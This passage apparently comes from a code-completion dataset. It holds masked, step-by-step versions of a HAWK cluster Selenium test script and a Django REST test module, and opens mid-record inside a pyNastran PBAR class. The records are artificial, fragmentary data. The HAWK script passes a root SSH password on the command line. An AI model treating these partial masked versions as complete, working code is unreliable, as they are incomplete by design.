todo:: support SOL 600 default\n\n Jdefault = 0.5 * (self.I1[i] + self.I2[i])\n self.J[i] = double_or_blank(card, 6, 'J', Jdefault)\n self.nsm[i] = double_or_blank(card, 7, 'non-structural_mass', 0.0)\n\n if 0:\n self.C1 = double_or_blank(card, 9, 'C1', 0.0)\n self.C2 = double_or_blank(card, 10, 'C2', 0.0)\n self.D1 = double_or_blank(card, 11, 'D1', 0.0)\n self.D2 = double_or_blank(card, 12, 'D2', 0.0)\n self.E1 = double_or_blank(card, 13, 'E1', 0.0)\n self.E2 = double_or_blank(card, 14, 'E2', 0.0)\n self.F1 = double_or_blank(card, 15, 'F1', 0.0)\n self.F2 = double_or_blank(card, 16, 'F2', 0.0)\n\n #: default=infinite; assume 1e8\n self.K1 = double_or_blank(card, 17, 'K1', 1e8)\n #: default=infinite; assume 1e8\n self.K2 = double_or_blank(card, 18, 'K2', 1e8)\n #: I12 -> use I12()\n self.i12 = double_or_blank(card, 19, 'I12', 0.0)\n if self.A == 0.0 and self.i12 == 0.0:\n assert self.K1 is None, 'K1 must be blank if A=0.0 and I12=0.0; A=%r I12=%r K1=%r' % (self.A, self.i12, self.K1)\n assert self.K2 is None, 'K2 must be blank if A=0.0 and I12=0.0; A=%r I12=%r K2=%r' % (self.A, self.i12, self.K2)\n assert len(card) <= 20, 'len(PBAR card) = %i' % len(card)\n\n i = self.property_id.argsort()\n self.property_id = self.property_id[i]\n self.material_id = self.material_id[i]\n\n self.area = self.area[i]\n self.I1 = self.I1[i]\n self.I2 = self.I2[i]\n self.J = self.J[i]\n self.nsm = self.nsm[i]\n\n unique_pids = unique(self.property_id)\n\n if len(unique_pids) != len(self.property_id):\n raise RuntimeError('There are duplicate PCOMP IDs...')\n self._cards = []\n self._comments = []\n\n #=========================================================================\n def get_index(self, property_ids):\n if isinstance(property_ids, int):\n property_ids = array([property_ids])\n if property_ids is None:\n return arange(self.n)\n\n indexs = searchsorted(self.property_id, property_ids)\n assert len(indexs) == len(property_ids), 'indexs=%s pids=%s' % (indexs, property_ids)\n return 
indexs\n\n #=========================================================================\n def write_bdf(self, f, size=8, property_ids=None):\n if self.n:\n if property_ids is None:\n i = arange(self.n)\n else:\n i = searchsorted(self.property_id, property_ids)\n\n for (pid, mid, area, I1, I2, J) in zip(self.property_id[i], self.material_id[i],\n self.area[i], self.I1[i], self.I2[i], self.J[i]):\n card = ['PBAR', pid, mid, area, I1, I2, J]\n f.write(print_card_8(card))\n",
"step-ids": [
3,
6,
7,
8,
9
]
}
|
[
3,
6,
7,
8,
9
] |
#!/usr/bin/python3
"""HAWK GUI interface Selenium test: drives the HAWK web GUI with Selenium
(firefox, chrome or chromium) and optionally verifies cluster state over SSH."""
import argparse
import re
import sys

import hawk_test_driver
import hawk_test_results
import hawk_test_ssh


def parse_args():
    """Build and parse the command-line options for the test run."""
    parser = argparse.ArgumentParser(description='HAWK GUI interface Selenium test')
    parser.add_argument('-b', '--browser', type=str, required=True,
                        help='Browser to use in the test. Can be: firefox, chrome, chromium')
    parser.add_argument('-H', '--host', type=str, default='localhost',
                        help='Host or IP address where HAWK is running')
    parser.add_argument('-P', '--port', type=str, default='7630',
                        help='TCP port where HAWK is running')
    parser.add_argument('-p', '--prefix', type=str, default='',
                        help='Prefix to add to Resources created during the test')
    parser.add_argument('-t', '--test-version', type=str, required=True,
                        help='Test version. Ex: 12-SP3, 12-SP4, 15, 15-SP1')
    parser.add_argument('-s', '--secret', type=str, default='',
                        help='root SSH Password of the HAWK node')
    parser.add_argument('-r', '--results', type=str, default='',
                        help='Generate hawk_test.results file')
    return parser.parse_args()


def main():
    """Run the whole GUI test sequence; return the number of failed tests."""
    args = parse_args()

    # Driver instance that talks to the HAWK web UI through Selenium.
    browser = hawk_test_driver.hawkTestDriver(addr=args.host.lower(), port=args.port,
                                              browser=args.browser.lower(),
                                              version=args.test_version.lower())

    # Accumulates pass/fail status for every test performed.
    results = hawk_test_results.resultSet()

    # SSH-side verification is only possible when the root password was supplied.
    ssh = None
    if args.secret:
        ssh = hawk_test_ssh.hawkTestSSH(args.host.lower(), args.secret)
        results.add_ssh_tests()

    # Names of the resources created during the test. The optional prefix must
    # be alphanumeric; otherwise it is dropped with a warning.
    if args.prefix and not re.match(r"^\w+$", args.prefix.lower()):
        print("ERROR: Prefix must contain only numbers and letters. Ignoring")
        args.prefix = ''
    mycluster = args.prefix.lower() + 'Anderes'
    myprimitive = args.prefix.lower() + 'cool_primitive'
    myclone = args.prefix.lower() + 'cool_clone'
    mygroup = args.prefix.lower() + 'cool_group'

    # Tests to perform, with SSH checks interleaved where cluster state
    # must be verified out-of-band.
    browser.test('test_set_stonith_maintenance', results)
    if ssh:
        ssh.verify_stonith_in_maintenance(results)
    browser.test('test_disable_stonith_maintenance', results)
    browser.test('test_view_details_first_node', results)
    browser.test('test_clear_state_first_node', results)
    browser.test('test_set_first_node_maintenance', results)
    if ssh:
        ssh.verify_node_maintenance(results)
    browser.test('test_disable_maintenance_first_node', results)
    browser.test('test_add_new_cluster', results, mycluster)
    browser.test('test_remove_cluster', results, mycluster)
    browser.test('test_click_on_history', results)
    browser.test('test_generate_report', results)
    browser.test('test_click_on_command_log', results)
    browser.test('test_click_on_status', results)
    browser.test('test_add_primitive', results, myprimitive)
    if ssh:
        ssh.verify_primitive(myprimitive, args.test_version.lower(), results)
    browser.test('test_remove_primitive', results, myprimitive)
    if ssh:
        ssh.verify_primitive_removed(results)
    browser.test('test_add_clone', results, myclone)
    browser.test('test_remove_clone', results, myclone)
    browser.test('test_add_group', results, mygroup)
    browser.test('test_remove_group', results, mygroup)
    browser.test('test_click_around_edit_conf', results)

    # Save results if run with -r or --results
    if args.results:
        results.logresults(args.results)
    return results.get_failed_tests_total()


if __name__ == '__main__':
    # sys.exit (not quit) so the failure count becomes the process exit status
    # even when the site module is unavailable.
    sys.exit(main())
|
normal
|
{
"blob_id": "874668d5f3ea61b6aabde7b784078b431961a9c9",
"index": 9096,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nparser.add_argument('-b', '--browser', type=str, required=True, help=\n 'Browser to use in the test. Can be: firefox, chrome, chromium')\nparser.add_argument('-H', '--host', type=str, default='localhost', help=\n 'Host or IP address where HAWK is running')\nparser.add_argument('-P', '--port', type=str, default='7630', help=\n 'TCP port where HAWK is running')\nparser.add_argument('-p', '--prefix', type=str, default='', help=\n 'Prefix to add to Resources created during the test')\nparser.add_argument('-t', '--test-version', type=str, default='', required=\n True, help='Test version. Ex: 12-SP3, 12-SP4, 15, 15-SP1')\nparser.add_argument('-s', '--secret', type=str, default='', help=\n 'root SSH Password of the HAWK node')\nparser.add_argument('-r', '--results', type=str, default='', help=\n 'Generate hawk_test.results file')\n<mask token>\nif args.secret:\n ssh = hawk_test_ssh.hawkTestSSH(args.host.lower(), args.secret)\n results.add_ssh_tests()\nif args.prefix and not re.match('^\\\\w+$', args.prefix.lower()):\n print('ERROR: Prefix must contain only numbers and letters. 
Ignoring')\n args.prefix = ''\n<mask token>\nbrowser.test('test_set_stonith_maintenance', results)\nif args.secret:\n ssh.verify_stonith_in_maintenance(results)\nbrowser.test('test_disable_stonith_maintenance', results)\nbrowser.test('test_view_details_first_node', results)\nbrowser.test('test_clear_state_first_node', results)\nbrowser.test('test_set_first_node_maintenance', results)\nif args.secret:\n ssh.verify_node_maintenance(results)\nbrowser.test('test_disable_maintenance_first_node', results)\nbrowser.test('test_add_new_cluster', results, mycluster)\nbrowser.test('test_remove_cluster', results, mycluster)\nbrowser.test('test_click_on_history', results)\nbrowser.test('test_generate_report', results)\nbrowser.test('test_click_on_command_log', results)\nbrowser.test('test_click_on_status', results)\nbrowser.test('test_add_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive(myprimitive, args.test_version.lower(), results)\nbrowser.test('test_remove_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive_removed(results)\nbrowser.test('test_add_clone', results, myclone)\nbrowser.test('test_remove_clone', results, myclone)\nbrowser.test('test_add_group', results, mygroup)\nbrowser.test('test_remove_group', results, mygroup)\nbrowser.test('test_click_around_edit_conf', results)\nif args.results:\n results.logresults(args.results)\nquit(results.get_failed_tests_total())\n",
"step-3": "<mask token>\nparser = argparse.ArgumentParser(description='HAWK GUI interface Selenium test'\n )\nparser.add_argument('-b', '--browser', type=str, required=True, help=\n 'Browser to use in the test. Can be: firefox, chrome, chromium')\nparser.add_argument('-H', '--host', type=str, default='localhost', help=\n 'Host or IP address where HAWK is running')\nparser.add_argument('-P', '--port', type=str, default='7630', help=\n 'TCP port where HAWK is running')\nparser.add_argument('-p', '--prefix', type=str, default='', help=\n 'Prefix to add to Resources created during the test')\nparser.add_argument('-t', '--test-version', type=str, default='', required=\n True, help='Test version. Ex: 12-SP3, 12-SP4, 15, 15-SP1')\nparser.add_argument('-s', '--secret', type=str, default='', help=\n 'root SSH Password of the HAWK node')\nparser.add_argument('-r', '--results', type=str, default='', help=\n 'Generate hawk_test.results file')\nargs = parser.parse_args()\nbrowser = hawk_test_driver.hawkTestDriver(addr=args.host.lower(), port=args\n .port, browser=args.browser.lower(), version=args.test_version.lower())\nresults = hawk_test_results.resultSet()\nif args.secret:\n ssh = hawk_test_ssh.hawkTestSSH(args.host.lower(), args.secret)\n results.add_ssh_tests()\nif args.prefix and not re.match('^\\\\w+$', args.prefix.lower()):\n print('ERROR: Prefix must contain only numbers and letters. 
Ignoring')\n args.prefix = ''\nmycluster = args.prefix.lower() + 'Anderes'\nmyprimitive = args.prefix.lower() + 'cool_primitive'\nmyclone = args.prefix.lower() + 'cool_clone'\nmygroup = args.prefix.lower() + 'cool_group'\nbrowser.test('test_set_stonith_maintenance', results)\nif args.secret:\n ssh.verify_stonith_in_maintenance(results)\nbrowser.test('test_disable_stonith_maintenance', results)\nbrowser.test('test_view_details_first_node', results)\nbrowser.test('test_clear_state_first_node', results)\nbrowser.test('test_set_first_node_maintenance', results)\nif args.secret:\n ssh.verify_node_maintenance(results)\nbrowser.test('test_disable_maintenance_first_node', results)\nbrowser.test('test_add_new_cluster', results, mycluster)\nbrowser.test('test_remove_cluster', results, mycluster)\nbrowser.test('test_click_on_history', results)\nbrowser.test('test_generate_report', results)\nbrowser.test('test_click_on_command_log', results)\nbrowser.test('test_click_on_status', results)\nbrowser.test('test_add_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive(myprimitive, args.test_version.lower(), results)\nbrowser.test('test_remove_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive_removed(results)\nbrowser.test('test_add_clone', results, myclone)\nbrowser.test('test_remove_clone', results, myclone)\nbrowser.test('test_add_group', results, mygroup)\nbrowser.test('test_remove_group', results, mygroup)\nbrowser.test('test_click_around_edit_conf', results)\nif args.results:\n results.logresults(args.results)\nquit(results.get_failed_tests_total())\n",
"step-4": "<mask token>\nimport argparse, re, hawk_test_driver, hawk_test_ssh, hawk_test_results\nparser = argparse.ArgumentParser(description='HAWK GUI interface Selenium test'\n )\nparser.add_argument('-b', '--browser', type=str, required=True, help=\n 'Browser to use in the test. Can be: firefox, chrome, chromium')\nparser.add_argument('-H', '--host', type=str, default='localhost', help=\n 'Host or IP address where HAWK is running')\nparser.add_argument('-P', '--port', type=str, default='7630', help=\n 'TCP port where HAWK is running')\nparser.add_argument('-p', '--prefix', type=str, default='', help=\n 'Prefix to add to Resources created during the test')\nparser.add_argument('-t', '--test-version', type=str, default='', required=\n True, help='Test version. Ex: 12-SP3, 12-SP4, 15, 15-SP1')\nparser.add_argument('-s', '--secret', type=str, default='', help=\n 'root SSH Password of the HAWK node')\nparser.add_argument('-r', '--results', type=str, default='', help=\n 'Generate hawk_test.results file')\nargs = parser.parse_args()\nbrowser = hawk_test_driver.hawkTestDriver(addr=args.host.lower(), port=args\n .port, browser=args.browser.lower(), version=args.test_version.lower())\nresults = hawk_test_results.resultSet()\nif args.secret:\n ssh = hawk_test_ssh.hawkTestSSH(args.host.lower(), args.secret)\n results.add_ssh_tests()\nif args.prefix and not re.match('^\\\\w+$', args.prefix.lower()):\n print('ERROR: Prefix must contain only numbers and letters. 
Ignoring')\n args.prefix = ''\nmycluster = args.prefix.lower() + 'Anderes'\nmyprimitive = args.prefix.lower() + 'cool_primitive'\nmyclone = args.prefix.lower() + 'cool_clone'\nmygroup = args.prefix.lower() + 'cool_group'\nbrowser.test('test_set_stonith_maintenance', results)\nif args.secret:\n ssh.verify_stonith_in_maintenance(results)\nbrowser.test('test_disable_stonith_maintenance', results)\nbrowser.test('test_view_details_first_node', results)\nbrowser.test('test_clear_state_first_node', results)\nbrowser.test('test_set_first_node_maintenance', results)\nif args.secret:\n ssh.verify_node_maintenance(results)\nbrowser.test('test_disable_maintenance_first_node', results)\nbrowser.test('test_add_new_cluster', results, mycluster)\nbrowser.test('test_remove_cluster', results, mycluster)\nbrowser.test('test_click_on_history', results)\nbrowser.test('test_generate_report', results)\nbrowser.test('test_click_on_command_log', results)\nbrowser.test('test_click_on_status', results)\nbrowser.test('test_add_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive(myprimitive, args.test_version.lower(), results)\nbrowser.test('test_remove_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive_removed(results)\nbrowser.test('test_add_clone', results, myclone)\nbrowser.test('test_remove_clone', results, myclone)\nbrowser.test('test_add_group', results, mygroup)\nbrowser.test('test_remove_group', results, mygroup)\nbrowser.test('test_click_around_edit_conf', results)\nif args.results:\n results.logresults(args.results)\nquit(results.get_failed_tests_total())\n",
"step-5": "#!/usr/bin/python3\n\"\"\"HAWK GUI interface Selenium test: tests hawk GUI with Selenium using firefox or chrome\"\"\"\n\nimport argparse, re, hawk_test_driver, hawk_test_ssh, hawk_test_results\n\n### MAIN\n\n# Command line argument parsing\nparser = argparse.ArgumentParser(description='HAWK GUI interface Selenium test')\nparser.add_argument('-b', '--browser', type=str, required=True,\n help='Browser to use in the test. Can be: firefox, chrome, chromium')\nparser.add_argument('-H', '--host', type=str, default='localhost',\n help='Host or IP address where HAWK is running')\nparser.add_argument('-P', '--port', type=str, default='7630',\n help='TCP port where HAWK is running')\nparser.add_argument('-p', '--prefix', type=str, default='',\n help='Prefix to add to Resources created during the test')\nparser.add_argument('-t', '--test-version', type=str, default='', required=True,\n help='Test version. Ex: 12-SP3, 12-SP4, 15, 15-SP1')\nparser.add_argument('-s', '--secret', type=str, default='',\n help='root SSH Password of the HAWK node')\nparser.add_argument('-r', '--results', type=str, default='',\n help='Generate hawk_test.results file')\nargs = parser.parse_args()\n\n# Create driver instance\nbrowser = hawk_test_driver.hawkTestDriver(addr=args.host.lower(), port=args.port,\n browser=args.browser.lower(),\n version=args.test_version.lower())\n\n# Initialize results set\nresults = hawk_test_results.resultSet()\n\n# Establish SSH connection to verify status only if SSH password was supplied\nif args.secret:\n ssh = hawk_test_ssh.hawkTestSSH(args.host.lower(), args.secret)\n results.add_ssh_tests()\n\n# Resources to create\nif args.prefix and not re.match(r\"^\\w+$\", args.prefix.lower()):\n print(\"ERROR: Prefix must contain only numbers and letters. 
Ignoring\")\n args.prefix = ''\nmycluster = args.prefix.lower() + 'Anderes'\nmyprimitive = args.prefix.lower() + 'cool_primitive'\nmyclone = args.prefix.lower() + 'cool_clone'\nmygroup = args.prefix.lower() + 'cool_group'\n\n# Tests to perform\nbrowser.test('test_set_stonith_maintenance', results)\nif args.secret:\n ssh.verify_stonith_in_maintenance(results)\nbrowser.test('test_disable_stonith_maintenance', results)\nbrowser.test('test_view_details_first_node', results)\nbrowser.test('test_clear_state_first_node', results)\nbrowser.test('test_set_first_node_maintenance', results)\nif args.secret:\n ssh.verify_node_maintenance(results)\nbrowser.test('test_disable_maintenance_first_node', results)\nbrowser.test('test_add_new_cluster', results, mycluster)\nbrowser.test('test_remove_cluster', results, mycluster)\nbrowser.test('test_click_on_history', results)\nbrowser.test('test_generate_report', results)\nbrowser.test('test_click_on_command_log', results)\nbrowser.test('test_click_on_status', results)\nbrowser.test('test_add_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive(myprimitive, args.test_version.lower(), results)\nbrowser.test('test_remove_primitive', results, myprimitive)\nif args.secret:\n ssh.verify_primitive_removed(results)\nbrowser.test('test_add_clone', results, myclone)\nbrowser.test('test_remove_clone', results, myclone)\nbrowser.test('test_add_group', results, mygroup)\nbrowser.test('test_remove_group', results, mygroup)\nbrowser.test('test_click_around_edit_conf', results)\n\n# Save results if run with -r or --results\nif args.results:\n results.logresults(args.results)\n\nquit(results.get_failed_tests_total())\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class ProductModelTests(TestCase):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class SellerViewTests(TestCase):
@classmethod
def setUpTestData(cls):
Seller.objects.create(name='Bruna', email='bruna@example.com')
def test_get(self):
client = APIClient()
response = client.get('/produtos/sellers/')
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertEqual(data.get('count'), 1)
seller_first = data.get('results')[0]
self.assertEqual(seller_first.get('name'), 'Bruna')
self.assertEqual(seller_first.get('email'), 'bruna@example.com')
def test_post(self):
client = APIClient()
response = client.post('/produtos/sellers/', {'name': 'Bruna',
'email': 'bruna@example.com'})
self.assertEqual(response.status_code, 201)
self.assertEquals(Seller.objects.count(), 2)
self.assertEquals(Seller.objects.last().name, 'Bruna')
class ProductViewTests(TestCase):
@classmethod
def setUpTestData(cls):
Product.objects.create(name='Cadeira', price=250, quantity=2,
status='Active')
def test_get(self):
client = APIClient()
response = client.get('/produtos/')
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertEqual(data.get('count'), 1)
product_first = data.get('results')[0]
self.assertEqual(product_first.get('name'), 'Cadeira')
self.assertEqual(product_first.get('price'), 250)
self.assertEqual(product_first.get('quantity'), 2)
self.assertEqual(product_first.get('status'), 'Active')
def test_post(self):
client = APIClient()
response = client.post('/produtos/', {'name': 'Mesa', 'price': 300,
'quantity': 2, 'status': 'ACTIVE'})
self.assertEqual(response.status_code, 201)
self.assertEquals(Product.objects.count(), 2)
self.assertEquals(Product.objects.last().name, 'Mesa')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ProductModelTests(TestCase):
def product_class_str(self):
product = Product()
product.name = 'Cadeira'
self.assertEquals(product.__str__(), 'Cadeira')
<|reserved_special_token_0|>
class SellerViewTests(TestCase):
@classmethod
def setUpTestData(cls):
Seller.objects.create(name='Bruna', email='bruna@example.com')
def test_get(self):
client = APIClient()
response = client.get('/produtos/sellers/')
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertEqual(data.get('count'), 1)
seller_first = data.get('results')[0]
self.assertEqual(seller_first.get('name'), 'Bruna')
self.assertEqual(seller_first.get('email'), 'bruna@example.com')
def test_post(self):
client = APIClient()
response = client.post('/produtos/sellers/', {'name': 'Bruna',
'email': 'bruna@example.com'})
self.assertEqual(response.status_code, 201)
self.assertEquals(Seller.objects.count(), 2)
self.assertEquals(Seller.objects.last().name, 'Bruna')
class ProductViewTests(TestCase):
@classmethod
def setUpTestData(cls):
Product.objects.create(name='Cadeira', price=250, quantity=2,
status='Active')
def test_get(self):
client = APIClient()
response = client.get('/produtos/')
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertEqual(data.get('count'), 1)
product_first = data.get('results')[0]
self.assertEqual(product_first.get('name'), 'Cadeira')
self.assertEqual(product_first.get('price'), 250)
self.assertEqual(product_first.get('quantity'), 2)
self.assertEqual(product_first.get('status'), 'Active')
def test_post(self):
client = APIClient()
response = client.post('/produtos/', {'name': 'Mesa', 'price': 300,
'quantity': 2, 'status': 'ACTIVE'})
self.assertEqual(response.status_code, 201)
self.assertEquals(Product.objects.count(), 2)
self.assertEquals(Product.objects.last().name, 'Mesa')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SellerModelTests(TestCase):
def test_class_str(self):
seller = Seller()
seller.name = 'Bruna'
self.assertEquals(seller.__str__(), 'Bruna')
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class ProductModelTests(TestCase):
def product_class_str(self):
product = Product()
product.name = 'Cadeira'
self.assertEquals(product.__str__(), 'Cadeira')
def product_to_dict(self):
product = Product()
product.name = 'Cadeira'
product.price = 2000
product.seller = 'Bruna'
product.quantity = 10
product.status = 'Active'
result_product = {'id': None, 'name': 'Cadeira', 'price': 2000,
'seller': 'Bruna', 'quantity': 10, 'status': 'Active'}
self.assertEquals(product.to_dict(), result_product)
class SellerViewTests(TestCase):
@classmethod
def setUpTestData(cls):
Seller.objects.create(name='Bruna', email='bruna@example.com')
def test_get(self):
client = APIClient()
response = client.get('/produtos/sellers/')
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertEqual(data.get('count'), 1)
seller_first = data.get('results')[0]
self.assertEqual(seller_first.get('name'), 'Bruna')
self.assertEqual(seller_first.get('email'), 'bruna@example.com')
def test_post(self):
client = APIClient()
response = client.post('/produtos/sellers/', {'name': 'Bruna',
'email': 'bruna@example.com'})
self.assertEqual(response.status_code, 201)
self.assertEquals(Seller.objects.count(), 2)
self.assertEquals(Seller.objects.last().name, 'Bruna')
class ProductViewTests(TestCase):
@classmethod
def setUpTestData(cls):
Product.objects.create(name='Cadeira', price=250, quantity=2,
status='Active')
def test_get(self):
client = APIClient()
response = client.get('/produtos/')
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertEqual(data.get('count'), 1)
product_first = data.get('results')[0]
self.assertEqual(product_first.get('name'), 'Cadeira')
self.assertEqual(product_first.get('price'), 250)
self.assertEqual(product_first.get('quantity'), 2)
self.assertEqual(product_first.get('status'), 'Active')
def test_post(self):
client = APIClient()
response = client.post('/produtos/', {'name': 'Mesa', 'price': 300,
'quantity': 2, 'status': 'ACTIVE'})
self.assertEqual(response.status_code, 201)
self.assertEquals(Product.objects.count(), 2)
self.assertEquals(Product.objects.last().name, 'Mesa')
<|reserved_special_token_1|>
from django.test import TestCase
from .models import Seller, Product
from rest_framework.test import APIClient
import json
class SellerModelTests(TestCase):
def test_class_str(self):
seller = Seller()
seller.name = 'Bruna'
self.assertEquals(seller.__str__(), 'Bruna')
def test_to_dict(self):
seller = Seller()
seller.name = 'Bruna'
seller.email = 'bruna@example.com'
result_seller = {'id': None, 'name': 'Bruna', 'email':
'bruna@example.com'}
self.assertEquals(seller.to_dict(), result_seller)
def test_class_str_without_name(self):
seller = Seller()
self.assertEqual(seller.__str__(), '')
class ProductModelTests(TestCase):
def product_class_str(self):
product = Product()
product.name = 'Cadeira'
self.assertEquals(product.__str__(), 'Cadeira')
def product_to_dict(self):
product = Product()
product.name = 'Cadeira'
product.price = 2000
product.seller = 'Bruna'
product.quantity = 10
product.status = 'Active'
result_product = {'id': None, 'name': 'Cadeira', 'price': 2000,
'seller': 'Bruna', 'quantity': 10, 'status': 'Active'}
self.assertEquals(product.to_dict(), result_product)
class SellerViewTests(TestCase):
@classmethod
def setUpTestData(cls):
Seller.objects.create(name='Bruna', email='bruna@example.com')
def test_get(self):
client = APIClient()
response = client.get('/produtos/sellers/')
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertEqual(data.get('count'), 1)
seller_first = data.get('results')[0]
self.assertEqual(seller_first.get('name'), 'Bruna')
self.assertEqual(seller_first.get('email'), 'bruna@example.com')
def test_post(self):
client = APIClient()
response = client.post('/produtos/sellers/', {'name': 'Bruna',
'email': 'bruna@example.com'})
self.assertEqual(response.status_code, 201)
self.assertEquals(Seller.objects.count(), 2)
self.assertEquals(Seller.objects.last().name, 'Bruna')
class ProductViewTests(TestCase):
@classmethod
def setUpTestData(cls):
Product.objects.create(name='Cadeira', price=250, quantity=2,
status='Active')
def test_get(self):
client = APIClient()
response = client.get('/produtos/')
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertEqual(data.get('count'), 1)
product_first = data.get('results')[0]
self.assertEqual(product_first.get('name'), 'Cadeira')
self.assertEqual(product_first.get('price'), 250)
self.assertEqual(product_first.get('quantity'), 2)
self.assertEqual(product_first.get('status'), 'Active')
def test_post(self):
client = APIClient()
response = client.post('/produtos/', {'name': 'Mesa', 'price': 300,
'quantity': 2, 'status': 'ACTIVE'})
self.assertEqual(response.status_code, 201)
self.assertEquals(Product.objects.count(), 2)
self.assertEquals(Product.objects.last().name, 'Mesa')
<|reserved_special_token_1|>
from django.test import TestCase
from .models import Seller, Product
from rest_framework.test import APIClient
import json
class SellerModelTests(TestCase):
def test_class_str(self):
seller = Seller()
seller.name = "Bruna"
self.assertEquals(seller.__str__(), "Bruna")
def test_to_dict(self):
seller = Seller()
seller.name = "Bruna"
seller.email = "bruna@example.com"
result_seller = {
"id": None,
"name": "Bruna",
"email": "bruna@example.com"
}
self.assertEquals(seller.to_dict(), result_seller)
def test_class_str_without_name(self):
seller = Seller()
self.assertEqual(seller.__str__(), "")
class ProductModelTests(TestCase):
def product_class_str(self):
product = Product()
product.name = "Cadeira"
self.assertEquals(product.__str__(), "Cadeira")
def product_to_dict(self):
product = Product()
product.name = "Cadeira"
product.price = 2000
product.seller = "Bruna"
product.quantity = 10
product.status = "Active"
result_product = {
"id": None,
"name": "Cadeira",
"price": 2000,
"seller": "Bruna",
"quantity": 10,
"status": "Active"
}
self.assertEquals(product.to_dict(), result_product)
class SellerViewTests(TestCase):
@classmethod
def setUpTestData(cls):
Seller.objects.create(name="Bruna", email="bruna@example.com")
def test_get(self):
client = APIClient()
response = client.get('/produtos/sellers/')
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertEqual(data.get('count'), 1)
seller_first = data.get('results')[0]
self.assertEqual(seller_first.get("name"), "Bruna")
self.assertEqual(seller_first.get("email"), "bruna@example.com")
def test_post(self):
client = APIClient()
response = client.post('/produtos/sellers/', {
"name": "Bruna",
"email": "bruna@example.com"
})
self.assertEqual(response.status_code, 201)
self.assertEquals(Seller.objects.count(), 2)
self.assertEquals(Seller.objects.last().name, "Bruna")
class ProductViewTests(TestCase):
@classmethod
def setUpTestData(cls):
Product.objects.create(name="Cadeira", price=250, quantity=2, status="Active")
def test_get(self):
client = APIClient()
response = client.get('/produtos/')
self.assertEqual(response.status_code, 200)
data = json.loads(response.content)
self.assertEqual(data.get('count'), 1)
product_first = data.get('results')[0]
self.assertEqual(product_first.get("name"), "Cadeira")
self.assertEqual(product_first.get("price"), 250)
self.assertEqual(product_first.get("quantity"), 2)
self.assertEqual(product_first.get("status"), "Active")
def test_post(self):
client = APIClient()
response = client.post('/produtos/', {
"name": "Mesa",
"price": 300,
"quantity": 2,
"status": "ACTIVE"
})
self.assertEqual(response.status_code, 201)
self.assertEquals(Product.objects.count(), 2)
self.assertEquals(Product.objects.last().name, "Mesa")
|
flexible
|
{
"blob_id": "71ab4ada4062ecde1463f2a766b5951860d0f2fb",
"index": 7250,
"step-1": "<mask token>\n\n\nclass ProductModelTests(TestCase):\n <mask token>\n <mask token>\n\n\nclass SellerViewTests(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n Seller.objects.create(name='Bruna', email='bruna@example.com')\n\n def test_get(self):\n client = APIClient()\n response = client.get('/produtos/sellers/')\n self.assertEqual(response.status_code, 200)\n data = json.loads(response.content)\n self.assertEqual(data.get('count'), 1)\n seller_first = data.get('results')[0]\n self.assertEqual(seller_first.get('name'), 'Bruna')\n self.assertEqual(seller_first.get('email'), 'bruna@example.com')\n\n def test_post(self):\n client = APIClient()\n response = client.post('/produtos/sellers/', {'name': 'Bruna',\n 'email': 'bruna@example.com'})\n self.assertEqual(response.status_code, 201)\n self.assertEquals(Seller.objects.count(), 2)\n self.assertEquals(Seller.objects.last().name, 'Bruna')\n\n\nclass ProductViewTests(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n Product.objects.create(name='Cadeira', price=250, quantity=2,\n status='Active')\n\n def test_get(self):\n client = APIClient()\n response = client.get('/produtos/')\n self.assertEqual(response.status_code, 200)\n data = json.loads(response.content)\n self.assertEqual(data.get('count'), 1)\n product_first = data.get('results')[0]\n self.assertEqual(product_first.get('name'), 'Cadeira')\n self.assertEqual(product_first.get('price'), 250)\n self.assertEqual(product_first.get('quantity'), 2)\n self.assertEqual(product_first.get('status'), 'Active')\n\n def test_post(self):\n client = APIClient()\n response = client.post('/produtos/', {'name': 'Mesa', 'price': 300,\n 'quantity': 2, 'status': 'ACTIVE'})\n self.assertEqual(response.status_code, 201)\n self.assertEquals(Product.objects.count(), 2)\n self.assertEquals(Product.objects.last().name, 'Mesa')\n",
"step-2": "<mask token>\n\n\nclass ProductModelTests(TestCase):\n\n def product_class_str(self):\n product = Product()\n product.name = 'Cadeira'\n self.assertEquals(product.__str__(), 'Cadeira')\n <mask token>\n\n\nclass SellerViewTests(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n Seller.objects.create(name='Bruna', email='bruna@example.com')\n\n def test_get(self):\n client = APIClient()\n response = client.get('/produtos/sellers/')\n self.assertEqual(response.status_code, 200)\n data = json.loads(response.content)\n self.assertEqual(data.get('count'), 1)\n seller_first = data.get('results')[0]\n self.assertEqual(seller_first.get('name'), 'Bruna')\n self.assertEqual(seller_first.get('email'), 'bruna@example.com')\n\n def test_post(self):\n client = APIClient()\n response = client.post('/produtos/sellers/', {'name': 'Bruna',\n 'email': 'bruna@example.com'})\n self.assertEqual(response.status_code, 201)\n self.assertEquals(Seller.objects.count(), 2)\n self.assertEquals(Seller.objects.last().name, 'Bruna')\n\n\nclass ProductViewTests(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n Product.objects.create(name='Cadeira', price=250, quantity=2,\n status='Active')\n\n def test_get(self):\n client = APIClient()\n response = client.get('/produtos/')\n self.assertEqual(response.status_code, 200)\n data = json.loads(response.content)\n 